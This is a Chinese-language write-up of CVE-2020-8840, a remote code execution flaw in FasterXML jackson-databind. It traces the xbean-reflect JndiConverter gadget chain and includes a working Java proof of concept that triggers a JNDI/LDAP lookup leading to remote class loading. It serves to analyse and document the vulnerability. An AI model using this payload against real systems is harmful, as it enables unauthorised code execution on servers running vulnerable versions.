(CVE-2020-8840)FasterXML jackson-databind 远程代码执行漏洞

一、漏洞简介

FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。

此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。

二、漏洞影响

  • jackson-databind 2.0.0 – 2.9.10.2
  • 经验证fastjson在开启了autoType功能的情况下,影响最新的fastjson v1.2.62版本

三、复现过程

可以在git提交记录中清楚看到利用的具体类

image

分析下利用链,通过传进参数asText,触发setter,setAsText()函数

image

随后跟进toObject()函数

image

最终进到JndiConverter重写的toObjectImp()函数

image

此时出现经典的JNDI注入,text 刚好就是我们传进的asText,我们可控,从而达到命令执行目的

image

poc

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
    public static void main(String args[]) {
        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";

        try {
            mapper.readValue(json, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-02-24 14:58:44

results matching ""

    No results matching ""